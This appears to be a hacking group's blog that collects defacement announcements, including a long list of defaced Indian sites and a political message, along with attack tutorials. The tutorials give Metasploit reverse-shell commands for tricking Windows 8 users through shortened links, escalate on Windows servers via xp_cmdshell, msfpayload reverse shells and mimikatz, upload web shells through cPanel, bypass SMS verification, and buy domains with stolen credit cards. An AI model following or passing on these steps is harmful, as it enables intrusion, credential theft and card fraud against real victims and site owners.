Cyber Secure Pakistan Hacked

https://i0.wp.com/www.vijayanand.name/blog/wp-content/uploads/2012/10/6a00d8341c652b53ef017615ff8a0b970c-800wi.jpg
Today 
Cyber Secure Pakistan Got Hacked By 
1337 H4x0r
Hacked Website With Mirror:
Hacker Said ,
============================
Nothing is Perfect Just Us
  HackeD By 1337

 Pakistani l33t H4x0r w4s h3r3

Cyber Secure Pakistan Stamped !


 Planning to Secure Pakistan Cyber Space ?
 Yo homies ..Had a bad sunday going on so i thought to Pwn y0 guys!! This Website has been officially hacked, but I am Really not happy to do so. I would surely like this website to be more securer than this. I want Pakistani networks to be more secured. I am just doing it here, so that if the so called admin wants any help to secure his box/web/Server, join us @ Madleets.com .Lets make Pakistan more stronger. If we would be good within ourselves, only then we would be able to fight others. Thank-yOu. You guys really wanna learn Security ?
Please DO contact us ! Khan signs out.

I have Deleted Every file and Backup 😉 Contact me if you need it

 LeeTHaXor@Y7Mail.Com

We are Security Lovers 😀

Hire us !! Without us you won’t be able to secure

 www.MaDLeeTs.com

Greetz and sh0uts out to : my all homies

How To Hack Windows 8

Salam GuyZ,
today i’ll tell you how to hack Windows 8 Suing Java Signed Applet 😛
no doubt that most of you guys thinking that how to hack windows 8 
but in reality you can do it 🙂
just follow me 
==========
Somethings Must Be Cleared First !!!
1) ONLY For Educational Purpose
2) I am Not Responsible For Any Damage Caused By You 🙂
===============
Now Exploiting!

1)User Must Run Your Exploit In Order To Hack Him/Her
2)You Have To Forward Port!
3) Router 🙂

=================
Things We Will Need

1)BacktracK
2)Metasploit
3)This Exploit => multi/browser/java_signed_applet
4)Victim (having Windows 8)

 =======================
Lets Exploit,

First Forward Your Port 
Use This Port 

” 1337 “


Now Open msfconsole and type :

multi/browser/java_signed_applet

Like This In Picture 

set Payload ,

set PAYLOAD java/meterpreter/reverse_tcp

 set lhost

set LHOST 192.168.x.x(your ip)

Actually , there is no problem if you didnt set lhost and payload ,
it will do it automatically 🙂
Now You Have To Set Port , The Port Your Forwarded,
1337
type this to set port

set SRVPORT 1337





than change the path to the exploit for this hust type this

set URIPATH /


now type exploit to start the java applet exploit

exploit


if your port was successfully forwarded than server will be started like in the picture above 

All You Have To Do Now Is Just Send Your IP to the victim 

for doing this i’ve a nice trick 😀
goto any link shorter website like adfly or tinylink
and type this
http://YOUR IP

thank click on Short Link or any thing like that..

if your victim clicks on your given link than pop-up will appear


and if he clicks on “Run
than meterpreter shell will be opened


now just type 

sysinfo 

FOR LAN USERS – MUST READ

If you have users in LAN or you are in Net Cafe,
Than You Can Redirect All Users To Your Malicious Link By Hijacking The DNS

===============

Aww Man You Are Using Windows 8 ? And Afraid Of Getting Hacked ?
Use Latest Updates And Anti-Virus Programs , Do Not Click On Any Unwanted Link!

Note:Please Dont Leech
Written By Zaid Sparrow
Images Are Not Mine , Images Credits Goes To Dr-Z0mbie Haxor

How To Bypass Access Denied In Windows Servers ?

Most of us here can hack websites and servers. But what we hate the most is an error message- Access Denied! We know some methods to bypass certain restrictions using the symlink, privilege-escalation using local root exploits and some similar attacks.
But, these get the job done only on Linux servers. What about windows servers?
Here are some ways to bypass certain restrictions on windows servers or getting SYSTEM privileges.
  • Using “sa” account to execute commands by MSSQL query via ‘xp_cmdshell’ stored procedure.
  • Using meterpreter payload to get a reverse shell over the target machine.
  • Using browser_autopwn. (Really…)
  • Using other tools like pwdump7, mimikatz, etc.

Using the tools is an easy way, but the real fun of hacking lies in the first three methods I mentioned above.
1. Using xp_cmdshell-

Most of the times on windows servers, we have read permission over the files of other IIS users, which is needed to make this method work.
If we are lucky enough, we will find login credentials of “sa” account of MSSQL server inside web.config file of any website.
You must be wondering why only “sa”?
Here, “sa” stands for Super Administrator and as the name tells, this user has all possible permissions over the server.
The picture below shows the connection string containing login credentials of “sa” account.

Using this, we can log into MSSQL server locally (using our web backdoor) & as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path.

So, after getting the “sa” account, we can login remotely using HeidiSQL
HeidiSQL is an awesome tool to connect to remote database servers. You can download it here.
After logging into MSSQL server with sa account, we get a list of databases and their contents.
Now we can execute commands using MSSQL queries via xp_cmdshell. (With administrator privileges)
Syntax for the query is-
xp_cmdshell ‘[command]’

For example, if I need to know my current privileges, I would query-
xp_cmdshell ‘whoami’


This shows that I am currently NT Authority/System, which most of us know is the highest user in the windows user hierarchy.
Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP.
Note: If the server does not have xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online.
  
2. Meterpreter Payload-

This method is quite easy and comes useful when we cannot read files of other users, but we can execute commands.
Using metasploit, generate a reverse shell payload binary.
For example-
msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe
Now we will upload this executable to the server using our web backdoor.
Run multi/handler auxiliary at our end. (Make sure the ports are forwarded properly)
Now it’s time to execute the payload.
If everything goes right, we will get a meterpreter session over the target machine as shown below-
We can also use php, asp or other payloads.
3. Browser Autopwn-
This seems odd, as a way of hacking a server. But I myself found this as a clever way to do the job, especially in scenarios where we are allowed to execute commands, but we cannot run executables (our payloads) due to software restriction policies in domain environment.
Most of the windows servers have outdated Internet Explorer and we can exploit them if we can execute commands.
I think it is clear by now that what I’m trying to explain 😉
We can start Internet Explorer from command line and make it browse to a specific URL.
Syntax for  this-
iexplore.exe [URL]
Where URL would our server address which would be running browser_autopwn. After that we can use railgun to avoid antivirus detection.


4. Using readily available tools-
Tools like pwdump and mimikatz can crack passwords of windows users.
#pwdump7 gives out the NTLM hashes of the users which can be cracked further using John the Ripper.
The following screenshot shows NTLM hashes from pwdump7:
#mimikatz is another great tool which extracts the plain text passwords of users from lsass.exe. The tool is some language other than English so do watch tutorials on how to use it.
Following picture shows plain text passwords from mimikatz:
You can google about them and learn how to use these tools and what actually they exploit to get the job done for you.
I hope you can now exploit every another windows server.

Happy Hacking 🙂

Note:This Tutorial Is Not Written By Me , All Credits Goes To Real Author (Y)

Indian Websites Hacked !

Hacked
Today 
Indian Websites Got Hacked By The Group Of Hackers Named
“TheHackersArmy”
Hacked Sites Are Below With Zone-h Mirrors
http://forum.fundcare.in/THA.htm
http://www.zone-h.org/mirror/id/19693015

http://techshare.facebookedu.co.in/THA.htm
http://www.zone-h.org/mirror/id/19693440

http://medicaid.co.in/
http://www.zone-h.org/mirror/id/19692630

http://aecl.in/THA.htm
http://www.zone-h.org/mirror/id/19693360

http://littlegeniusindia.co.in/THA.htm
http://www.zone-h.org/mirror/id/19693354

http://fatehgroup.in/THA.htm
http://www.zone-h.org/mirror/id/19693426

http://regencycredits.in/THA.htm
http://www.zone-h.org/mirror/id/19693437

http://chandanindustries.co.in/THA.htm
http://www.zone-h.org/mirror/id/19693419

http://fundcare.in/THA.htm
http://www.zone-h.org/mirror/id/19693044

http://vyaparbhavishya.in/index.php
http://www.zone-h.org/mirror/id/19692642

http://enkayenterprises.in/THA.htm
http://www.zone-h.org/mirror/id/19693328

http://amengineering.in/THA.htm
http://www.zone-h.org/mirror/id/19693302

http://krishnapower.co.in/index.php
http://www.zone-h.org/mirror/id/19692644

http://easywebhosting.in/THA.html
http://www.zone-h.org/mirror/id/19693222

http://invotech.in/THA.htm
http://www.zone-h.org/mirror/id/19693232

http://columbuselectronics.in/THA.htm
http://www.zone-h.org/mirror/id/19693179

http://theicons.in/THA.htm
http://www.zone-h.org/mirror/id/19693167

http://hotelmaasaraswatikatra.in/THA.html
http://www.zone-h.org/mirror/id/19692785

http://modernjewellers.in/THA.html
http://www.zone-h.org/mirror/id/19692706

http://manage.precisionmachines.in/THA.htm
http://www.zone-h.org/mirror/id/19693403

http://rightthink.in/THA.html
http://www.zone-h.org/mirror/id/19692677

http://asianfurniture.in/THA.htm
http://www.zone-h.org/mirror/id/19693150

http://bluefeather.in/THA.htm
http://www.zone-h.org/mirror/id/19693080

http://piramid.in/THA.html
http://www.zone-h.org/mirror/id/19692711

http://imrantravels.in/THA.html
http://www.zone-h.org/mirror/id/19692821

http://atmanahansirmour.in/THA.htm
http://www.zone-h.org/mirror/id/19693137

http://afiainfotech.in/THA.ht
http://www.zone-h.org/mirror/id/19693259

http://store.afiainfotech.in/THA.htm
http://www.zone-h.org/mirror/id/19693258

http://querymanager.afiainfotech.in/THA.htm
http://www.zone-h.org/mirror/id/19693257

http://products.afiainfotech.in/THA.htm
http://www.zone-h.org/mirror/id/19693255

http://newsletter.afiainfotech.in/THA.htm
http://www.zone-h.org/mirror/id/19693254

http://kantaelectricals.co.in/THA.htm
http://www.zone-h.org/mirror/id/19693338

http://fortunegroup.org.in/THA.htm
http://www.zone-h.org/mirror/id/19693049

http://blessing4u.us/THA.htm
http://www.zone-h.org/mirror/id/19693160

http://excelpower.biz/THA.htm
http://www.zone-h.org/mirror/id/19693067

http://ernpower.biz/THA.htm
http://www.zone-h.org/mirror/id/19693068

http://stepindia.biz/index.php
http://www.zone-h.org/mirror/id/19692665

http://shyamadevi.org/index.php
http://www.zone-h.org/mirror/id/19692668

http://buddhavihartalbehat.org/THA.htm
http://www.zone-h.org/mirror/id/19693103

http://rmsgcollegeofeducation.org/THA.html
http://www.zone-h.org/mirror/id/19692675

http://samanagroup.org/THA.html
http://www.zone-h.org/mirror/id/19692671

http://rkengineers.info/THA.htm
http://www.zone-h.org/mirror/id/19693276

http://excelautomation.net/THA.htm
http://www.zone-h.org/mirror/id/19693330

http://neotechconcepts.com/
http://www.zone-h.org/mirror/id/19693116

http://khaitannetwork.com/index.php
http://www.zone-h.org/mirror/id/19692639

http://bansalindiagroup.com/THA.htm
http://www.zone-h.org/mirror/id/19693133

http://travel.driftdevelopers.com/THA.htm
http://www.zone-h.org/mirror/id/19693219

http://radheytourandtravels.com/THA.html
http://www.zone-h.org/mirror/id/19692691

http://archivemarketingindia.com/THA.htm
http://www.zone-h.org/mirror/id/19693154

http://propertyjhansi.com/THA.html
http://www.zone-h.org/mirror/id/19692693

http://tsncdexmcx.com/index.php
http://www.zone-h.org/mirror/id/19692647

http://peeessbusinessworld.com/THA.html
http://www.zone-h.org/mirror/id/19692717

http://orientalacademyltp.com/THA.html
http://www.zone-h.org/mirror/id/19692730

http://ncgcorporate.com/THA.html
http://www.zone-h.org/mirror/id/19692733

http://matabhuvaneshwarishakti.com/THA.html
http://www.zone-h.org/mirror/id/19692766

http://tnsysmeryl.com/THA.html
http://www.zone-h.org/mirror/id/19692778

http://kartavyainfra.com/THA.html
http://www.zone-h.org/mirror/id/19692791

http://kangravalleyschool.com/THA.html
http://www.zone-h.org/mirror/id/19692795

http://himalayanskyrider.com/THA.html
http://www.zone-h.org/mirror/id/19692800

http://fitnessshoppejhs.com/THA.htm
http://www.zone-h.org/mirror/id/19693062

http://joharitravels.com/THA.html
http://www.zone-h.org/mirror/id/19692806

http://jayamishra.com/THA.html
http://www.zone-h.org/mirror/id/19692811

http://hoteltridevkatra.com/THA.html
http://www.zone-h.org/mirror/id/19692877

http://hotelmalabarinnkatra.com/THA.html
http://www.zone-h.org/mirror/id/19692882

http://hotelashokainternationalkatra.com/THA.html
http://www.zone-h.org/mirror/id/19692884

http://gsadewas.com/THA.htm
http://www.zone-h.org/mirror/id/19693006

http://dreamoverseashp.com/THA.htm
http://www.zone-h.org/mirror/id/19693086

http://ditmmathura.com/THA.htm
http://www.zone-h.org/mirror/id/19693090
 

Hackers Said That ,
Message
Go back to 1947,The begining of indian Oppression , That led to destruction and illegal occupation of KASHMIR. Lies have been covered up,Truth echoes SAMEER , a martyr at age 9,They killed him by kicking his jawline,Forced a bamboo right down his throat,And his soul went afloat. NEELOFAR and ASIYA, my sisters drowned to death, Molestated and raped till their last breath. Ask a MOTHER how her son died, a SISTER how she cried,A FATHER left torn up inside. We are with you Brothers ,A brother who fought for right,A brother who threw stones with all his might, A brother smothered and slayed,A brother who had faith in freedom all the way. We say enough! to the brutality being committed to the innocent civilians in KASHMIR by Political Administration for power. ——————————————————————————————————————————————————————————————- ——————————————————————————————————————————————————————————————-
FREE KASHMIR

.::We Are::.
——————————————————————————————————————————————————————————————-
— THA Disaster — Gatha Incoming THA Dark — THA RUDE — SoveReign-PsyferR – THA Cronos Ip — THA Rockking Haxor — THA Rox Root– — THA X HaxOr — THA Trojaan –THA Meister– And All Muslim Hackers 

How To Get/Card/Free .com .net .org .info .biz .co.uk domains ?

How To Get Free Domains ?
How To Card A Domain ??
How To Get Domain For Free ???? 

huh … your searching over here 😉

===============================================

Note:
this Is Pure Hacking , i’ll not be http://www.kidsec.com responsible for anything caused by you !!
Read , Do And Card At Your Own , Yes On Your Own Risk!!!
Because Carding Is 1000000% Illegal!

===========================================

Things You’ll Need!

1)Credit Card
2)Cardable Domain Hosting
3)My Tut Off Course ! 😀 😛

Note
I am not using socks or proxy , i carded kidsec.com without it :v :v
1st of all try to get a fresh cc(Credit Card) there are some hacking forums and they also have 
Accounts And Database Dumps Section
There you can find fresh cc easily!
or there are variety of ways to get CC..

  CardAble Domain Hosting 

Now we need cardable domain hosting and they must accept credit cards
i have 2 sites http://www.kidsec.com and em sharing it
1)eNom Domain Hosting
2)Comment Below To Get it 🙂

Carding

 Now open domain hosting and fill all the information like
first name , last name , zip code ,  country , city , address , phone(fake) , state , email(yourown )from Credit Card. Don Not Enter Your Own Information! Use CC billing address!

Than Choose Payment Method As
Pay Via Credit Card Or Debit Card

 now enter billing details
Card Holder’s Name
Credit Card Number
Cvv Code
Expiry Date

And Click On finish Or blah blah..
wait , if your credit is working and live than you’ll get Congratulations Notice and Confirmation Email 🙂 😉 xP 

Now Enjoy Free Domain 🙂
Comment For Any HeLp
Please Do Not Leech
0xGreyHAT T4p10N
Tut Written By Zaid Sparrow
I am Not Responsible !

Dmasti.pk Exploited

Today ,
Dmasti.pk Got Exploited By Pakistani Hacker 
T4p10N & ArYaNZ KhAnZ
Post Was Posted From Admin’s Account Saying ~
Thread –
Hey Guyz , Dmasti.pk Exploited by T4p10N!
please Secure It 😛 its Rank In Pakistan 1000 😛 thats y i’em leaving this web
please protect it
Dmasti Hacked And PenetraTeD ~~ =pP
./T4p10N! contact me plz Zaid Sparrow
Webmaster Contact me 😉
http://www.kidsec.com
xyberkid@gmail.com

Metro One Pakistan Security Breached

Metro One Pakistan TV Channel Security Breached!
today , one of the famous Pakistan News Channel 
Metro One
Security Breached by Pakistani Hacker
The vulnerability Has Been Reported To Admin
The Security Wasn’t Good , 
Thats Why Security Got Breached
The Website Will Not Be Defaced!!!
Be Secure , Be Carefull
Please Take a Look At Your Website’s Security or Contact Me 🙂
T4p10n~ 

How To Upload Shell ?

Shell Uploading Through cPanel!
In This tut ill tell y0uh 
How to upload shell through cPanel
Or
Shelling Website from cPanel

Well this tut is just for beginners
Plz dont abuse!
===============================================
so what y0u need ?
1st cPanel

2nd Madspot Shell V2 (awaaasome)


Now , open cPanel and goto 
Legacy File Manager 


than => Webroot Folder => Go


In New Tab , y0u’ll see Upload Files button 
press upload files Button and select y0ur shell and Click on upload!
\m/ Zindabad \m/
Shell Uploaded 🙂

Thankx For Reading
Note:For Educational Purpose ONLY!!!

tut officially written By Zaid Sparrow aka T4p10N

How To Bypass SMS/Mobile Verification ?

ByPass SMS Verification

Hey Guyz ?
Today I’ll tell you ow to Bypass Mobile SMS verification 😀
yea , now no need to enter real mobile number to get code :v
all you need is

SMS Verification Website!
dont panic , i’ll give you 😉

Ok first of all goto the website below
http://sms-verification.com/

and copy any number given on the website than click on that number! (the number you copied)

now goto the website where you want to Bypass Phone SMS verification.

enter the number you copied from the website!

now refresh the Number Page and You’ll See Your Verification Code 😉

I hope You Enjoyed The Post ,
Note:
Thank You
Please Donot Leech
Tut written By Zaid Sparrow